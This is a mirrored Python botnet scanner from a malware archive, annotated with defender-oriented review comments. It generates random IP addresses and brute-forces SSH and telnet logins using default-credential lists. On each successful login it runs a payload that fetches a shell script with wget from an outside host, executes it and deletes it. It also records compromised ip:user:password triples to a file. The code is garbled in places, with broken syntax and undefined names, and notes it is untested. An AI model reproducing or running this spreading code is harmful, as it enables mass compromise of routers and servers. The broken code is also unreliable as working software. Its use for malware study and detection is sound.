mirror of https://github.com/threatland/TL-BOTS
#!/usr/bin/python
|
|
"""
|
|
Author: ~B1NARY~
|
|
Skype: bl4ck.j3sus
|
|
XMPP: b1nary@darkness.su
|
|
Title: ~B1NARY~ PRIVATE BOTNET SCANNER
|
|
Description: PRIVATE BOTNET SCANNER FROM YOUR OWN ~B1NARY~ Tha GoD
|
|
Version: 1.0
|
|
MADE DATE: 3-30-16
|
|
|
|
***THIS HAS NOT BEEN TESTED YET, IT MAY OR MAY NOT WORK***
|
|
"""
|
|
import threading, random, socket, time, sys, re, os, paramiko, StringIO, argparse, random
|
|
from multiproccessing import Process
|
|
paramiko.util.log_to_file("/dev/null")
|
|
|
|
#DEFINES
|
|
# NOTE(review): this mirrored listing has lost its indentation and carries "|" filler lines,
# so it is a reference copy for analysis rather than a runnable sample.
# Payload executed on a host after a successful login: change to /tmp, fetch a shell script
# over plain HTTP with wget, run it with sh, then delete it.
# Defender view: a remote login session that spawns wget and then sh on a freshly written file
# in /tmp is the behaviour to alert on; the script is removed afterwards, so process and
# network telemetry are more reliable than a later file scan.
command="cd /tmp; wget http://1.1.1.1/gb.sh; sh gb.sh; rm -rf gb.sh"
|
|
# Credential dictionaries. The entries mix user names, passwords and empty strings and are
# largely factory defaults for routers, modems and small Linux devices. f() below tries every
# userlist x passlist pair. Mitigation: change default credentials and disable password
# authentication on anything reachable from the internet.
userlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor', 'security', '', 'security', 'storwatch', '', 'specialist', 'super', '', '5777364', 'superadmin', '', 'secret', 'superman', '', '21241036', 'support', '', 'support', 'tech', '', 'tech', 'technician', '', 'T!m3W4rn3rC4bl3', 'test', '', 'test', 'ubnt', '', 'ubnt', 'UN', '', 'unknown', 'user', '', 'user', 'volition', '', 'volition', 'vt100', '', 'public', 'VTech', '', 'VTech']
|
|
passlist = ['root', '', 'toor', 'admin', 'user', 'guest', 'login', 'changeme', '1234', '12345', '123456', 'default', 'pass', 'password', '3comcso', '', 'RIP000', 'admin', '', '1234', 'admin', '', '8mb1t3M3', 'admin', '', 'admin', 'admin', '', 'c0nf1gur3m3', 'admin', '', 'cableroot', 'admin', '', 'changeme', 'admin', '', 'motorola', 'admin', '', 'password', 'admin', '', 'Password0', 'Administrator', '', 'admin', 'adminttd', '', 'adminttd', 'comcast', '', '1234', 'cusadmin', '', 'highspeed', 'D-Link', '', 'D-Link', 'debug', '', 'synnet', 'guest', '', 'guest', 'hscroot', '', 'abc123', 'manager', '', 'manager', 'monitor', '', 'monitor', 'pi', '', 'raspberry', 'PW', '', 'unkown', 'recovery', '', 'recovery', 'root', '', '1234', 'root', '', '123456', 'root', '', 'admin', 'root', '', 'password', 'root', '', 'root', 'root', '', 'toor']
|
|
# user:password pairs iterated by sshscanner.brutethenload for its SSH login attempts.
combolist = ["root:root","root:admin","admin:admin","ubnt:ubnt""root:1234","admin:1234","guest:guest","user:user","test:test","pi:raspberry","vagrant:vagrant"]
|
|
# Substring filter: brutethenload discards any generated address whose text contains an entry.
blacklist = ['127']
|
|
# Text appended to the "Press <ENTER>" prompt printed after the banner.
randomtext = random.choice('Start Infecting Routerz','Start Spreading Malware',
|
|
'Start Adding Them Botz','Make The Bot Count Go Up',
|
|
'Start..Nigga You Know What You Need Some Black Jesus','Know We Out Chere!!')
|
|
thread = threading.Thread
|
|
# Command-line parsing; thread_count is taken from args.threadcount.
parser = argparse.ArgumentParser()
|
|
args = parser.parse_args()
|
|
thread_count = args.threadcount
|
|
# Module-level receive buffer and start timestamp, both referenced by sock_read_until.
bufferz = ''
|
|
start_time = time.time()
|
|
host = HOST
|
|
# A single module-level socket object; loadem and f both use this same `tn`.
tn = socket.socket()
|
|
|
|
#BANNER
|
|
# Start-up banner followed by an interactive pause; nothing in this run touches the network.
print '\r\n'
|
|
print '###############################################################################'
|
|
print '# ___ __________ ____ _______ _____ _______________.___. ___ #'
|
|
print '# / _ \_/\ \______ \/_ |\ \ / _ \\______ \__ | | / _ \_/\ #'
|
|
print '# \/ \___/ | | _/ | |/ | \ / /_\ \| _// | | \/ \___/ #'
|
|
print '# | | \ | / | \/ | \ | \\____ | #'
|
|
print '# |______ / |___\____|__ /\____|__ /____|_ // ______| #'
|
|
print '# \/ \/ \/ \/ \/ #'
|
|
print '###############################################################################'
|
|
print 'r\n'
|
|
# Blocks until the operator presses ENTER; the prompt ends with the text chosen in randomtext.
raw_input('Press <ENTER> To '+randomtext)
|
|
|
|
#ARGUMENTS
|
|
# Option definitions. Per the help strings the inputs are: a list of IPs to brute force (-b),
# a list of IP/user/password entries to run the download command against (-x), an output file
# name (-o), a scan-while-bruting mode (-l), and a positional thread count.
# The -o file is where f() appends ip:user:password hits, so such a file is an artefact worth
# looking for when this tool is found on a machine.
parser.add_argument("-b","--brute",type=str, help="Brute force from list of IPs")
|
|
parser.add_argument("-x","--execute",type=str, help="Exucute Wget/tftp from List;[IP+USER+PASS")
|
|
parser.add_argument("-o","--output",type=str, help="OutputFile Name")
|
|
parser.add_argument("-l","--load",type=str, help="Scan As Bruting")
|
|
parser.add_argument("threadcount",type=str, help="# of Threads")
|
|
|
|
#THE CODING BEGINS
|
|
# Mode dispatch on the parsed options: --brute works on the given IP list (mass_check),
# --load goes to the SSH scanner (sshscanner / brutethenload), --execute calls mass_pwn.
if args.brute:
|
|
read_h = open(str(args.brute),'a+')
|
|
elif args.brute:
|
|
mass_check(args.brute)
|
|
if args.load:
|
|
sshscanner(args.load)
|
|
elif args.load:
|
|
brutethenload(args.load)
|
|
|
|
|
|
if args.execute:
|
|
mass_pwn(args.execute)
|
|
|
|
# Thread subclass that generates IPv4 addresses and attempts SSH password logins on port 22
# with the pairs in combolist, running the module-level payload `command` on success.
class sshscanner(threading.Thread):
|
|
global combolist
|
|
# Address-selection mode from sys.argv[2]. "A", "B" and "C" take the leading one, two or three
# octets from sys.argv[3]; the other mode names handled below select built-in prefix lists or
# fully random addresses.
ipclassinfo = sys.argv[2]
|
|
global ipclassinfo
|
|
if ipclassinfo == "A":
|
|
ip1 = sys.argv[3]
|
|
global ip1
|
|
elif ipclassinfo == "B":
|
|
ip1 = sys.argv[3].split(".")[0]
|
|
ip2 = sys.argv[3].split(".")[1]
|
|
global ip1
|
|
global ip2
|
|
elif ipclassinfo == "C":
|
|
ips = sys.argv[3].split(".")
|
|
num=0
|
|
for ip in ips:
|
|
num=num+1
|
|
if num == 1:
|
|
ip1 = ip
|
|
elif num == 2:
|
|
ip2 = ip
|
|
elif num == 3:
|
|
ip3 = ip
|
|
global ip1
|
|
global ip2
|
|
global ip3
|
|
# Worker loop: pick an address, drop it if it matches blacklist, test TCP/22, then try each
# combolist pair over SSH.
def brutethenload(self):
|
|
while 1:
|
|
try:
|
|
while 1:
|
|
thisipisbad='no'
|
|
# The unfixed octets are random in every mode, so the hosts probed are arbitrary addresses
# inside the chosen ranges. From the receiving side this is indiscriminate internet-wide SSH
# probing, which is why any exposed port 22 sees these default-credential attempts.
if ipclassinfo == "A":
|
|
self.host = ip1+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "B":
|
|
self.host = ip1+'.'+ip2+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "C":
|
|
self.host = ip1+'.'+ip2+'.'+ip3+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "BRAZIL":
|
|
br = ["179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126"]
|
|
self.host = random.choice(br)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "SUPER":
|
|
yeet = ["122","131","161","37","186","187","31","188","201","2","200"]
|
|
self.host = random.choice(yeet)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "LUCKY":
|
|
lucky = ["125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180"]
|
|
self.host = random.choice(lucky)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "LUCKY2":
|
|
lucky2 = [ "122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118" ]
|
|
self.host = random.choice(lucky2)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "GOOD":
|
|
good = ["113.53","101.108","101.109"]
|
|
self.host = random.choice(good)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "ALL"
|
|
allips = ["113.53","101.108","101.109","152.12","125.11","125.26","125.27","200.62","179.127","186.232","179.106","179.222","179.107","201.75","201.225","161.10","161.18","179.127","187.107","187.102","187.121","179.32","201.221","131.72","131.161","131.255","131.221","186.232","186.207","179.33","186.112","186.113","186.114","186.115","186.116","186.117","186.118","186.119","62.24","78.144","78.145","78.146","78.147","78.148","78.149","78.150","78.151","84.13","89.241","89.242","89.243","92.10","92.11","92.12","92.13","92.14","92.17","92.15","92.18","92.16","92.23","92.24","92.25","92.26","92.27","92.28","92.29","84.43","84.13","195.74","195.12","84.252","84.242","84.144","84.240","178.239","31.164","31.165","188.154","188.155","179.105","179.152","189.29","189.32","189.33","189.34","189.35","189.39","189.4","189.54","189.55","189.60","189.61","189.62","189.63","189.126","125.24","125.25","125.26","125.27","125.28","113.53","101.51","101.108","118.175","118.173","182.52","180.180","122.178","122.170","182.65","182.68","182.70","182.75","186.112","186.113","186.114","186.115","186.116","186.118",]
|
|
self.host = random.choice(allips)+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
elif ipclassinfo == "RAND":
|
|
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
else:
|
|
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
# Substring test against blacklist; a matching address is discarded and a new one generated.
for badip in blacklist:
|
|
if badip in self.host:
|
|
thisipisbad='yes'
|
|
if thisipisbad=='no':
|
|
break
|
|
username='root'
|
|
password=""
|
|
port = 22
|
|
# Plain TCP connect with a 3 second timeout, closed at once: a reachability check on port 22
# before the SSH client is used.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
|
|
s.settimeout(3)
|
|
s.connect((self.host, port))
|
|
s.close()
|
|
ssh = paramiko.SSHClient()
|
|
# AutoAddPolicy accepts whatever host key the server presents, without verification.
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
|
dobreak=False
|
|
# One password login per combolist entry; "n/a" on either side of the colon stands for an
# empty user name or password. In sshd logs this appears as a short burst of failed password
# logins for several accounts from one source, which login rate limiting and key-only
# authentication are meant to stop.
for passwd in combolist:
|
|
if ":n/a" in passwd:
|
|
password=""
|
|
else:
|
|
password=passwd.split(":")[1]
|
|
if "n/a:" in passwd:
|
|
username=""
|
|
else:
|
|
username=passwd.split(":")[0]
|
|
try:
|
|
ssh.connect(self.host, port = port, username=username, password=password, timeout=3)
|
|
dobreak=True
|
|
break
|
|
except:
|
|
pass
|
|
if True == dobreak:
|
|
break
|
|
badserver=True
|
|
# Execution check: echoes a fixed marker string (written with \x escapes in this source) and
# only treats the host as usable if the marker comes back on stdout - presumably to filter out
# restricted shells and low-interaction honeypots.
stdin, stdout, stderr = ssh.exec_command("echo '\x67\x61\x79\x66\x67\x74'")
|
|
output = stdout.read()
|
|
if "gayfgt" in output:
|
|
badserver=False
|
|
# On a confirmed hit: print host|user|password|port, run the payload `command`, wait 15 seconds,
# and append host:user:password to the file named by sys.argv[4].
if badserver == False:
|
|
print 'Found '+self.host+'|'+username+'|'+password+'|'+str(port)
|
|
ssh.exec_command(""+command+"")
|
|
time.sleep(15)
|
|
file_h = open(sys.argv[4],'a')
|
|
file_h.write(self.host+":"+username+":"+password+"\n")
|
|
file_h.close()
|
|
ssh.close()
|
|
# Every exception is swallowed, so the enclosing loop simply moves on to another address.
except:
|
|
pass
|
|
|
|
# Reads from socket `tn` in chunks of up to 40960 bytes, appending to bufferz, and returns the
# buffer once `criteria` appears in it. Elapsed time is measured against the module-level
# start_time; when it exceeds `timeout` an Exception with a "timeout" message is raised.
def sock_read_until(tn, criteria, timeout=30):
|
|
while time.time() - start_time < timeout:
|
|
bufferz += tn.recv(40960)
|
|
time.sleep(0.01)
|
|
if criteria in bufferz: return bufferz
|
|
raise Exception('sock_read_until \x1b[1;33m timeout \x1b[0m')
|
|
|
|
|
|
# Reads the file named by read_h line by line, takes the text before the first ":" as an
# address, and starts one thread per line running f() on it, printing the active thread count.
# On Ctrl-C the process sends itself signal 9.
def mass_check(read_h):
|
|
try:
|
|
for line in open(read_h).readlines())
|
|
ip_info = line.split(":")
|
|
e = Thread(target=f, args=(ip_info[0],))
|
|
e.start()
|
|
print threading.active_count()
|
|
print threading.active_count() > thread_count:
|
|
pass
|
|
except KeyboardInterrupt: os.kill(os.getpid(),9)
|
|
|
|
|
|
# Reads ip:user:password lines from targets_file and starts one thread per line running
# loadem(ip, user, password); errors while starting a thread are ignored. It then spins in a
# busy loop while the active thread count is above thread_cnt. On Ctrl-C the process sends
# itself signal 9.
def mass_pwn(targets_file):
|
|
try:
|
|
targets_file_h = open(targets_file).readlines()
|
|
for line in targets_file_h:
|
|
ip_info = line.split(":")
|
|
try:
|
|
e = Thread(target=loadem, args=(ip_info[0],ip_info[1],ip_info[2]))
|
|
e.start()
|
|
except:
|
|
pass
|
|
|
|
|
print '[Thread]: ',threading.active_count()
|
|
while threading.active_count() > thread_cnt:
|
|
pass
|
|
|
|
|
except KeyboardInterrupt: os.kill(os.getpid(),9)
|
|
|
|
# Worker for mass_pwn: replays a known user/password against HOST and pushes the payload.
# It connects the shared module-level socket to port 22 but then speaks a plain-text,
# telnet-style login (user name line, wait for ":", password line, "sh"), not the SSH protocol.
# Returns the text read up to the next "#" prompt, or 'ILLEGAL!!!' if that read fails; any
# other error is swallowed and the function returns None.
def loadem(HOST,user,password):
|
|
try:
|
|
x = ''
|
|
tn.connect((HOST,22))
|
|
print tn.recv(40960)
|
|
tn.send(user + "\n")
|
|
time.sleep(1)
|
|
print sock_read_until(tn,":",10)
|
|
tn.send(password + "\n")
|
|
print "Spraying"+HOST
|
|
tn.send("sh\n\n")
|
|
time.sleep(0.01)
|
|
x += sock_read_until(tn,"#",10)
|
|
print '[+] Got shell! '+HOST
|
|
# Login-failure keywords in the response abort this host.
if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x): raise Exception('fucked')
|
|
# Apparently meant to send the payload `command` to the remote shell line by line; a "> "
# continuation prompt in the reply is treated as an error.
for line in command("\n"):
|
|
tn.send(line+'\r\n'):
|
|
x = tn.recv(40960)
|
|
if '> ' in x: raise Exception
|
|
try:
|
|
arch = sock_read_until(tn,"#",3)
|
|
except:
|
|
arch = 'ILLEGAL!!!'
|
|
print arch
|
|
return arch
|
|
except:
|
|
pass
|
|
|
|
|
|
# Per-address worker started by mass_check. For each userlist x passlist pair it connects the
# shared socket to port 22, handles telnet-style option bytes, sends the user name, asks for a
# shell, and confirms command execution by echoing a marker. Hits are appended to args.output
# as ip:user:password.
def f(ip):
|
|
ip = ip_rstrip()
|
|
# Full cross product of the two dictionaries for one address: on the receiving device this is
# a long run of failed logins from a single source, the pattern lockout and rate-limit
# controls key on.
for user in userlist:
|
|
for passw in passlist:
|
|
x= ''
|
|
try:
|
|
tn.settimeout(35)
|
|
tn.connect((ip,22))
|
|
except Exception as e:
|
|
print "\x1b[1;31m[x] Failed: \x1b[0m", ip,e
|
|
break
|
|
else:
|
|
try:
|
|
x += tn.recv(40960)
|
|
except:
|
|
print "\x1b[1;33m[x] Timeout: \x1b[0m", ip,e
|
|
break
|
|
else:
|
|
try:
|
|
time.sleep(0.1)
|
|
x += tn.recv(40960)
|
|
sio = StringIO.StringIO(x)
|
|
try:
|
|
# Looks for byte values 251 and 253 (the telnet WILL and DO option codes) in the received
# data and answers through iac_wont / iac_dont, helpers that are not defined in this listing.
for i in sio.read(x)
|
|
if ord(i) == 251:
|
|
iac_dont_b = 1
|
|
elif ord(i) == 253:
|
|
iac_dont_b = 1
|
|
elif iac_wont_b == 1:
|
|
iac_wont(tn,ord(i))
|
|
iac_wont_b = 01
|
|
elif iac_dont_b = 1:
|
|
iac_dont(tn,ord(i))
|
|
iac_dont_b = 0
|
|
except:
|
|
print "THATS ILLEGAL!!!"
|
|
tn.send(user + "\r\n")
|
|
time.sleep(0.01)
|
|
# A 'User Access Verification' login banner is treated as a failure for this attempt.
if 'User Access Verification' in x:
|
|
raise Exception('cisco dicks')
|
|
x += tn.recv(409600)
|
|
tn.send("sh\n\n")
|
|
time.sleep(0.01)
|
|
tn.send("shell\n\n")
|
|
time.sleep(0.01)
|
|
sock_read_until(tn,"#")
|
|
# Execution check: asks the remote shell to `echo -e` a hex-escaped marker and waits for the
# decoded marker in the reply. The echo -e command with this escape sequence is a fixed string,
# so it is a usable match for honeypot logs and command auditing.
tn.send("echo -e '\\x62\\x69\\x6e\\x66\\x61\\x67\\x74'\n\n")
|
|
time.sleep(0.01)
|
|
x += tn.recv(409600)
|
|
time.sleep(0.01)
|
|
try:
|
|
x += sock_read_until(tn,"binfagt")
|
|
if 'binfagt' not in x:
|
|
raise Exception('no binfagt')
|
|
if '#' not in x and '>' not in x and '%' not in x and '$' not in x and ':' not in x:
|
|
raise Exception('no prompt')
|
|
# Login-failure keywords anywhere in the collected output mark the attempt as failed.
if ('wrong' in x) or ('invalid' in x) or ('incorrect' in x) or ('again' in x) or ('denied' in x) or ('bad' in x) or ('Bad' in x) or ('failed' in x) or ('failure' in x) or ('connection closed by' in x) or ('User not exist' in x) or ('information incomplete' in x):
|
|
raise Exception('fucked')
|
|
except:
|
|
print "[failed execution]",e,ip.rstrip()
|
|
continue
|
|
else:
|
|
# Hit logging: appends ip:user:password to the --output file and stops trying further
# passwords. A file of such triples found on a machine is an artefact of this tool.
file_h = open(args.output,'a+')
|
|
file_h.write(ip_rstrip() + ":" + user + ":" + passw+'\n')
|
|
file_h.close()
|
|
print '\x1b[1;32m[*] Execution on: \x1b[0m ',ip
|
|
break
|
|
except Execution as e:
|
|
continue
|
|
continue
|
|
continue
|
|
continue
|
|
return
|
|
|
|
# Starts int(sys.argv[1]) sshscanner threads; any error while creating or starting one is ignored.
for x in range(0,int(sys.argv[1])):
|
|
try:
|
|
t = sshscanner()
|
|
t.start()
|
|
except:
|
|
pass
|
|
|
|
# Trailing fragment that repeats the random-address generation and blacklist check from
# sshscanner.brutethenload; it refers to self outside of any method.
self.host = str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))+'.'+str(random.randrange(0,256))
|
|
for badip in blacklist:
|
|
if badip in self.host:
|
|
thisipisbad='yes'
|
|
if thisipisbad=='no':
|
|
break |